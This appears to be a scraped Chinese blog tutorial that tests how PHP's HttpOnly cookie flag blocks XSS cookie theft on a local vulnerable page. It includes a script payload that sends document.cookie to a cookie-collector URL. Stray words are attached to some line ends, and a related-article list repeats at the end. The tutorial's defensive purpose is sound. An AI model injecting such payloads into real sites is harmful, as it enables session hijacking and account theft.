cookie設置httponly屬性防禦XSS***
***者利用XSS漏洞獲取cookie或者session劫持,若是這裏麪包含了大量敏感信息(身份信息,管理員信息)等,***這裏用獲取的COOKIE登錄帳號,並進行非法操做。php
COOKIE設置httponly屬性能夠化解XSS漏洞***帶來的竊取cookie的危害。cookie
PHP中COOKIE設置方法:
session
<?php xss
setcookie("xsstest", "xsstest", time()+3600, "/", "", false, false);ide
?>測試
最後一個字段false是爲不設置httponly屬性,true爲已設置httponly屬性。spa
測試內容:3d
本次測試環境,搭建一個包含XSS漏洞的php環境。日誌
地址:http://localhost/home.php orm
如圖所示:
存在xss漏洞,獲取cookie的代碼爲:
<script>document.location = 'http://localhost/cookie_collect.php?cookie=' + document.cookie;</script>
獲取COOKIE的頁面爲:http://localhost/cookie_collect.php
如圖所示:
測試01
未設置httponly屬性,cookie設置爲:
<?php
setcookie("xsstest", "xsstest", time()+3600, "/", "", false, false);
?>
測試結果:
獲取到cookie的內容,如圖所示:
訪問日誌內容爲:
測試結果:利用跨站漏洞能夠獲取cookie內容。
測試02
設置httponly屬性,cookie設置爲:
<?php
setcookie("xsstest", "xsstest", time()+3600, "/", "", false, true);
?>
測試結果:
未獲取到cookie的內容,如圖所示:
訪問日誌內容爲:
測試結果:利用跨站漏洞不可以獲取cookie內容。
- 1. PHP設置Cookie的HTTPONLY屬性
- 2. php設置cookie爲HttpOnly防止XSS攻擊
- 3. Cookie的HttpOnly、secure、domain屬性
- 4. cookie 的HttpOnly 和 Secure 屬性
- 5. Cookie的Secure屬性和HttpOnly屬性
- 6. 系統安全--csrf攻擊、爲關鍵cookie設置httpOnly屬性(防止xss攻擊)安全問題
- 7. 會話cookie中缺乏HttpOnly屬性
- 8. Cookie中的httponly的屬性和做用
- 9. tomcat配置httponly屬性
- 10. httpOnly實現防止XSS時避免JavaScript讀取cookie
- 更多相關文章...
- • PHP Cookie - PHP教程
- • MySQL AS:設置別名 - MySQL教程
- • IntelliJ IDEA代碼格式化設置
- • JDK13 GA發佈:5大特性解讀
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. PHP設置Cookie的HTTPONLY屬性
- 2. php設置cookie爲HttpOnly防止XSS攻擊
- 3. Cookie的HttpOnly、secure、domain屬性
- 4. cookie 的HttpOnly 和 Secure 屬性
- 5. Cookie的Secure屬性和HttpOnly屬性
- 6. 系統安全--csrf攻擊、爲關鍵cookie設置httpOnly屬性(防止xss攻擊)安全問題
- 7. 會話cookie中缺乏HttpOnly屬性
- 8. Cookie中的httponly的屬性和做用
- 9. tomcat配置httponly屬性
- 10. httpOnly實現防止XSS時避免JavaScript讀取cookie